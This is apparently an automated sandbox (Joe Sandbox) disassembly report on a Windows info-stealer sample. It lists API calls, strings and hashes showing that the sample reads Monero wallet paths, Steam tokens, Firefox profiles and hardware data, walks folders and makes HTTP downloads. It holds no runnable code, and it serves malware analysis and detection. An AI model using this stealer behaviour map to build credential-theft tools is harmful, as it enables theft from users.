                                                                                    • Instruction ID: 77545b96f9c55e0de6ec71263cb7e0cfa71b0ad252d2fb84a837ede919fdf13f
                                                                                    • Opcode Fuzzy Hash: 457c7dca167f6097eb3decf56045153080dc014ab3c7bbf54f3f61cdd9435eba
                                                                                    • Instruction Fuzzy Hash: 133172B1900148AFCB00EFA9D956BDD7FB4AB15304F10803EF405A7282DB389648CBA9
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0041303F
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00404F2A: _EH_prolog.MSVCRT ref: 00404F2F
                                                                                      • Part of subcall function 00404F2A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
                                                                                      • Part of subcall function 00404F2A: StrCmpCA.SHLWAPI(?), ref: 00404FA6
                                                                                      • Part of subcall function 00404F2A: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
                                                                                      • Part of subcall function 00404F2A: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
                                                                                      • Part of subcall function 00404F2A: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
                                                                                      • Part of subcall function 00404F2A: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
                                                                                      • Part of subcall function 00404F2A: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041309D
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: HttpInternet$H_prologOpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                    • String ID: ERROR$ERROR
                                                                                    • API String ID: 1120091252-2579291623
                                                                                    • Opcode ID: aefbf7741ce3e4e0e52d37c23a8d594d106d3e01a68b0f1fcaa8373cdeccc4c0
                                                                                    • Instruction ID: 9cf05e6fcab295474e65acada3454b7dde9d8d835f49f967da0029279a9dc82d
                                                                                    • Opcode Fuzzy Hash: aefbf7741ce3e4e0e52d37c23a8d594d106d3e01a68b0f1fcaa8373cdeccc4c0
                                                                                    • Instruction Fuzzy Hash: FC210EB0900189EADB14FFA5C556BDDBBF4AF18348F50417EE80563682DB785B0CCB66
                                                                                    APIs
                                                                                    • OpenProcess.KERNEL32(00000410,00000000,2IA), ref: 00411019
                                                                                    • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411034
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0041103B
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                    • String ID: 2IA
                                                                                    • API String ID: 3183270410-4174278054
                                                                                    • Opcode ID: 30d4ffeda736fd64e0374663d8f4d70df638ccef9048597482ecb454b1010210
                                                                                    • Instruction ID: 8552e384592846dc61b773d54a0908cfb1ecd9fdbc452b9aa5e823a114c6ff4c
                                                                                    • Opcode Fuzzy Hash: 30d4ffeda736fd64e0374663d8f4d70df638ccef9048597482ecb454b1010210
                                                                                    • Instruction Fuzzy Hash: 85F03079905228BBEB60AB90DC49FDD3B78AB09715F000061BE85A61D0DBB4AAC4CBD4
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00413460: _EH_prolog.MSVCRT ref: 00413465
                                                                                    • Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 004144C0
                                                                                    • CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                    Similarity
                                                                                    • API ID: H_prolog$CreateObjectSingleSleepThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 2678630583-0
                                                                                    • Opcode ID: fb7f86a4d038d58da3621eb36abdba5b43a6fdb478c7a05049313af6d209da56
                                                                                    • Instruction ID: 90c6c212f9a98d1f3efa3e19a0f967dde8f702bf728512cfd2e6caf086527d46
                                                                                    • Opcode Fuzzy Hash: fb7f86a4d038d58da3621eb36abdba5b43a6fdb478c7a05049313af6d209da56
                                                                                    • Instruction Fuzzy Hash: 3E311E75900148AFCB11DFA4C995ADEBBB8FF18304F50412FF906A7281DB789B88CB95
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
                                                                                    • RegOpenKeyExA.KERNEL32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocOpenProcessQueryValue
                                                                                    • String ID:
                                                                                    • API String ID: 3676486918-0
                                                                                    • Opcode ID: a27f42a190018756939c2a186fac89ee64236d1eb1bb3ceecf19bf94991bf119
                                                                                    • Instruction ID: 832c21bd40a73018163515ce5beef45c93da2aa0da3d8997035a91abaf75a422
                                                                                    • Opcode Fuzzy Hash: a27f42a190018756939c2a186fac89ee64236d1eb1bb3ceecf19bf94991bf119
                                                                                    • Instruction Fuzzy Hash: E2F03A79240208FFEB119F91DC0AFAE7B7AEB45B40F104025FB01AA1A0D7B19A109B24
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,0042667C), ref: 0040FE2C
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,0042667C,00000000,?), ref: 0040FE33
                                                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040FE51
                                                                                    • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040FE6D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocOpenProcessQueryValue
                                                                                    • String ID:
                                                                                    • API String ID: 3676486918-0
                                                                                    • Opcode ID: 5a348dce4926add7b50cf3e1a3237f7deaf910ff3e5a2bc42b85e6f6daaeb5b6
                                                                                    • Instruction ID: c6a06fe1a5752460b6d2ee94bc9516a9de2a98ba0b24791e6944b9a77995073e
                                                                                    • Opcode Fuzzy Hash: 5a348dce4926add7b50cf3e1a3237f7deaf910ff3e5a2bc42b85e6f6daaeb5b6
                                                                                    • Instruction Fuzzy Hash: 11F05E7A240214FFFB209BD1DD0EFAA7A7EEB45B04F101035FB01A61A1D7B05900DB64
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 6%@$6%@
                                                                                    • API String ID: 0-3369382886
                                                                                    • Opcode ID: 1671fecbb1ebbe02e7eb2cc7cf41ad1b7ad139c209bd50c1cd2ae32b560b646f
                                                                                    • Instruction ID: badd9bf96c2c88f43ed760c6ea304aae97d5f1f2e5982ea7d2ae84e0ed7fb19c
                                                                                    • Opcode Fuzzy Hash: 1671fecbb1ebbe02e7eb2cc7cf41ad1b7ad139c209bd50c1cd2ae32b560b646f
                                                                                    • Instruction Fuzzy Hash: 9C4146716001199FCB01CF69D8806EDBBB1FF89318F1484BADC55EB395C3B8A982CB54
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0041453D
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,00000000,0042655B), ref: 0041458E
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Strings
                                                                                    • Soft\Steam\steam_tokens.txt, xrefs: 004145A6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                    • String ID: Soft\Steam\steam_tokens.txt
                                                                                    • API String ID: 40794102-3507145866
                                                                                    • Opcode ID: 5dea421be7ed3263a5a25ba242280bcfb85689912c92a282fb01fad9efacc230
                                                                                    • Instruction ID: 1e33fb55044e108cdc823b8717a6e4474b59c1838e8e2ba6a3b9a54ee3721495
                                                                                    • Opcode Fuzzy Hash: 5dea421be7ed3263a5a25ba242280bcfb85689912c92a282fb01fad9efacc230
                                                                                    • Instruction Fuzzy Hash: 61215B71C00148AACB14FBE5C966BDDBB74AF18308F50817EE411725D2DB78174CCA66
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004165DE
                                                                                      • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 00416620
                                                                                    • lstrcat.KERNEL32(?), ref: 0041663F
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 004162AF: _EH_prolog.MSVCRT ref: 004162B4
                                                                                      • Part of subcall function 004162AF: wsprintfA.USER32 ref: 004162D4
                                                                                      • Part of subcall function 004162AF: FindFirstFileA.KERNEL32(?,?), ref: 004162EB
                                                                                      • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,004268B0), ref: 00416308
                                                                                      • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,004268B4), ref: 00416322
                                                                                      • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416346
                                                                                      • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,00426525), ref: 00416357
                                                                                      • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416374
                                                                                      • Part of subcall function 004162AF: PathMatchSpecA.SHLWAPI(?,?), ref: 0041639B
                                                                                      • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 004163C7
                                                                                      • Part of subcall function 004162AF: lstrcat.KERNEL32(?,004268CC), ref: 004163D9
                                                                                      • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 004163E9
                                                                                      • Part of subcall function 004162AF: lstrcat.KERNEL32(?,004268D0), ref: 004163FB
                                                                                      • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 0041640F
                                                                                      • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416388
                                                                                      • Part of subcall function 004162AF: FindNextFileA.KERNEL32(00000000,?), ref: 004165AA
                                                                                      • Part of subcall function 004162AF: FindClose.KERNEL32(00000000), ref: 004165B9
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$H_prologwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                    • String ID:
                                                                                    • API String ID: 25485560-0
                                                                                    • Opcode ID: 6a69f1f2ed3b177ebeb85c1869a8abb099c5e14ffe340268730b21adc0a832aa
                                                                                    • Instruction ID: 6e5b766fc683c4e74d5122aabce2b8c3392ef196e7b74699665c3906b53d7570
                                                                                    • Opcode Fuzzy Hash: 6a69f1f2ed3b177ebeb85c1869a8abb099c5e14ffe340268730b21adc0a832aa
                                                                                    • Instruction Fuzzy Hash: 5A41AD7194022DABCF10EBF0EC13DED7B79AB18314F00466AF844A2192E77997958B96
                                                                                    APIs
                                                                                    • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6CC33095
                                                                                      • Part of subcall function 6CC335A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6CCBF688,00001000), ref: 6CC335D5
                                                                                      • Part of subcall function 6CC335A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CC335E0
                                                                                      • Part of subcall function 6CC335A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6CC335FD
                                                                                      • Part of subcall function 6CC335A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CC3363F
                                                                                      • Part of subcall function 6CC335A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CC3369F
                                                                                      • Part of subcall function 6CC335A0: __aulldiv.LIBCMT ref: 6CC336E4
                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC3309F
                                                                                      • Part of subcall function 6CC55B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CC556EE,?,00000001), ref: 6CC55B85
                                                                                      • Part of subcall function 6CC55B50: EnterCriticalSection.KERNEL32(6CCBF688,?,?,?,6CC556EE,?,00000001), ref: 6CC55B90
                                                                                      • Part of subcall function 6CC55B50: LeaveCriticalSection.KERNEL32(6CCBF688,?,?,?,6CC556EE,?,00000001), ref: 6CC55BD8
                                                                                      • Part of subcall function 6CC55B50: GetTickCount64.KERNEL32 ref: 6CC55BE4
                                                                                    • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6CC330BE
                                                                                      • Part of subcall function 6CC330F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6CC33127
                                                                                      • Part of subcall function 6CC330F0: __aulldiv.LIBCMT ref: 6CC33140
                                                                                      • Part of subcall function 6CC6AB2A: __onexit.LIBCMT ref: 6CC6AB30
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                    • String ID:
                                                                                    • API String ID: 4291168024-0
                                                                                    • Opcode ID: 07c4669e924b16a431b55ed6b94c865e92857ddd96191e44ecd686c4bebf0f38
                                                                                    • Instruction ID: 4138aa6dcedeec23922773e152800c6dd72218e3c0fb0f0fc5209c502e6b804a
                                                                                    • Opcode Fuzzy Hash: 07c4669e924b16a431b55ed6b94c865e92857ddd96191e44ecd686c4bebf0f38
                                                                                    • Instruction Fuzzy Hash: 70F02D2AE207499BCB10DFB899811E67374AF6B114F501319EC8853711FF30A1D983C9
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00411EBD
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00404DCA: _EH_prolog.MSVCRT ref: 00404DCF
                                                                                      • Part of subcall function 00404DCA: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E1E
                                                                                      • Part of subcall function 00404DCA: StrCmpCA.SHLWAPI(?), ref: 00404E38
                                                                                      • Part of subcall function 00404DCA: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E5C
                                                                                      • Part of subcall function 00404DCA: CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404E7D
                                                                                      • Part of subcall function 00404DCA: InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404EC8
                                                                                      • Part of subcall function 00404DCA: CloseHandle.KERNEL32(?,?,00000400), ref: 00404EE2
                                                                                      • Part of subcall function 00404DCA: InternetCloseHandle.WININET(00000000), ref: 00404EE9
                                                                                      • Part of subcall function 00404DCA: InternetCloseHandle.WININET(?), ref: 00404EF2
                                                                                      • Part of subcall function 00404DCA: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404EA4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologInternetlstrcpy$CloseFileHandle$Openlstrcat$CreateReadWritelstrlen
                                                                                    • String ID: B
                                                                                    • API String ID: 1244342732-1255198513
                                                                                    • Opcode ID: d47216f464f1931b2df8ee856ee7241989d4def9523d68925adc3d07f2806224
                                                                                    • Instruction ID: ca3b8767cd7f053f48781c5f7d31f618261e7555551c60cb52e9541aca8074f8
                                                                                    • Opcode Fuzzy Hash: d47216f464f1931b2df8ee856ee7241989d4def9523d68925adc3d07f2806224
                                                                                    • Instruction Fuzzy Hash: 49529E70904288EADB15EBE4D556BDDBBB49F28308F5040BEE449736C2DB781B4CCB66
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040B8B4
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040B463: _EH_prolog.MSVCRT ref: 0040B468
                                                                                      • Part of subcall function 0040B463: FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425F10,?,?,00425BEF,?,00000000,?), ref: 0040B4E7
                                                                                      • Part of subcall function 0040B463: StrCmpCA.SHLWAPI(?,00425F14,?,00000000,?), ref: 0040B50B
                                                                                      • Part of subcall function 0040B463: StrCmpCA.SHLWAPI(?,00425F18,?,00000000,?), ref: 0040B525
                                                                                      • Part of subcall function 0040B463: StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,00425F1C,?,?,00425BF2,?,00000000,?), ref: 0040B5C1
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy$lstrcat$FileFindFirstFolderPathlstrlen
                                                                                    • String ID: \..\
                                                                                    • API String ID: 271224408-4220915743
                                                                                    • Opcode ID: f86a2bfd5b95d5ce54e47b1d76212992246169cb21603bc030c522c566867405
                                                                                    • Instruction ID: d1c5d3571bf2dc713ef600a72c9e8dce1a4866c2c46e34e82ec1ac83aff49398
                                                                                    • Opcode Fuzzy Hash: f86a2bfd5b95d5ce54e47b1d76212992246169cb21603bc030c522c566867405
                                                                                    • Instruction Fuzzy Hash: BEA17EB1900288AACB14FBE5D516BDDBBB4AF19308F50417EE845736C2DB78170CCBA6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (@
                                                                                    • API String ID: 0-1346038526
                                                                                    • Opcode ID: 14c096e7427ac56c3ceb53db33e20d9e6aa561a8e8b35fd361e21ef125d2a38f
                                                                                    • Instruction ID: a472476b622eda2900000c9113d1a74c1da44a18ff9f30f91f8d3e78ba7694db
                                                                                    • Opcode Fuzzy Hash: 14c096e7427ac56c3ceb53db33e20d9e6aa561a8e8b35fd361e21ef125d2a38f
                                                                                    • Instruction Fuzzy Hash: 2B4136B190461AAFCF14EF94D9909AFBBB1EB04314F10447FEA05B7391D6789A818F98
                                                                                    APIs
                                                                                    • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,00000000,?,?,00405E98), ref: 00405DE8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-3916222277
                                                                                    • Opcode ID: b6b970fa2179954ca2d24890c2a9fa622aa91f7321e7267b4cd12840a3a9e1b1
                                                                                    • Instruction ID: ced7d7a04c1373fcb48adb74aa7fd2d2290691d2abba1c02f51b3daadd827661
                                                                                    • Opcode Fuzzy Hash: b6b970fa2179954ca2d24890c2a9fa622aa91f7321e7267b4cd12840a3a9e1b1
                                                                                    • Instruction Fuzzy Hash: A7113A71515A0AEBEF20CF94C9887ABB7F5FF04340F6084279541E62C0D7789A85EFA9
                                                                                    APIs
                                                                                    • SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FolderPathlstrcpy
                                                                                    • String ID: ;\B
                                                                                    • API String ID: 1699248803-1503912327
                                                                                    • Opcode ID: 83e6cc5221987d8d92d423f576c0c857877c6fa4a6664693c3a0d08b49ab16c4
                                                                                    • Instruction ID: 14537dfbc9dced5e712fe60e3e3a31c8263f1f5987e60415cd97e08317604fbc
                                                                                    • Opcode Fuzzy Hash: 83e6cc5221987d8d92d423f576c0c857877c6fa4a6664693c3a0d08b49ab16c4
                                                                                    • Instruction Fuzzy Hash: 27F01C7990014CBBDB51DB64C8909EDB7FDEBC4704F0091A6A90593280D6349F459B50
                                                                                    APIs
                                                                                    • SHFileOperationA.SHELL32(?), ref: 00411289
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileOperation
                                                                                    • String ID: ^qA
                                                                                    • API String ID: 3080627654-2929517337
                                                                                    • Opcode ID: 16d3a2ce8468c8175a4b0748f848a8e721ac03b0a06bcb47fc2447d8941ceac4
                                                                                    • Instruction ID: 1eaf247a329aa75c86d9425b1c51e37de0b4722cea675766f58cecf8dc0fcae1
                                                                                    • Opcode Fuzzy Hash: 16d3a2ce8468c8175a4b0748f848a8e721ac03b0a06bcb47fc2447d8941ceac4
                                                                                    • Instruction Fuzzy Hash: 68E075B0E0421D9FCB44EFA4D5466EEBBF8FF48308F40806AD919F7240E7B456458BA9
                                                                                    APIs
                                                                                    • GetCurrentHwProfileA.ADVAPI32(?), ref: 004104B3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CurrentProfile
                                                                                    • String ID: Unknown
                                                                                    • API String ID: 2104809126-1654365787
                                                                                    • Opcode ID: 36caf4ab5cc3db7ce453f452f44e3bfd2793be26340c29108ddef0f291e38d6b
                                                                                    • Instruction ID: 7df7fbcbbed776e4458085ee5b54356bf3053a549426d159850edd6d89fd8832
                                                                                    • Opcode Fuzzy Hash: 36caf4ab5cc3db7ce453f452f44e3bfd2793be26340c29108ddef0f291e38d6b
                                                                                    • Instruction Fuzzy Hash: D6E0C270A0010DFBDB10EBA4DA85FDD37BC6B04348F508125A601E3180DBBCE648CBA9
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00410CE2
                                                                                    • GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425BF6,?,?), ref: 00410CF6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
